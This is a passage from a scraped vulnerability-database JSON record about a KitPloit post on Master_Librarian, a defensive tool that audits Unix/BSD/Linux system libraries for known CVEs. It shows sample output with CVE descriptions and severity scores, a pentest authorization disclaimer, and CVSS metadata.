\n \t\t7.5 HIGH \n \n \t\tIn Python 3.6 through 3.6.10, 3.7 through 3.7.8, 3.8 through 3.8.4rc1, and 3.9 through 3.9.0b4 on Windows, a Trojan horse python3.dll might be used in cases where CPython is embedded in a native application. This occurs because python3X.dll may use an invalid search path for python3.dll loading (after Py_SetPath has been used). NOTE: this issue CANNOT occur when using python.exe from a standard (non-embedded) Python installation on Windows. \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2020-15523 \n \t\t6.9 MEDIUM \n \n xineramaproto 1.2.1 \n xcb-render 1.14 \n libpcre2-32 10.34 \n libbsd-ctor 0.10.0 \n libbsd 0.10.0 \n \t\tnlist.c in libbsd before 0.10.0 has an out-of-bounds read during a comparison for a symbol name from the string table (strtab). \n \t\thttps://nvd.nist.gov/vuln/detail/CVE-2019-20367 \n \t\t6.4 MEDIUM \n \n xft 2.3.3 \n \n \n\nTested in Ubuntu Linux, Fedora Linux and FreeBSD.\n\nThe purpose of this tool is use in local pentests; make sure you have proper [authorization](<https://www.kitploit.com/search/label/Authorization> \"authorization\" ) before using it. I do not have responsibility for your actions. 
You can use a hammer to construct a house or destroy it, choose the law path, don't be a bad guy, remember.\n\n \n \n\n\n**[Download Master_Librarian](<https://github.com/CoolerVoid/master_librarian> \"Download Master_Librarian\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-03-09T20:30:00", "type": "kitploit", "title": "Master_Librarian - A Simple Tool To Audit Unix/*BSD/Linux System Libraries To Find Public Security Vulnerabilities", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": true, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-4176", "CVE-2011-0640", "CVE-2016-0752", "CVE-2016-7944", "CVE-2017-1000082", "CVE-2018-19876", "CVE-2019-20367", "CVE-2020-10933", "CVE-2020-13529", "CVE-2020-13776", "CVE-2020-15523", "CVE-2020-15801", "CVE-2020-1712", "CVE-2021-32740"], "modified": "2022-03-09T20:30:00", "id": "KITPLOIT:2401425074991132396", "href": "http://www.kitploit.com/2022/03/masterlibrarian-simple-tool-to-audit.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}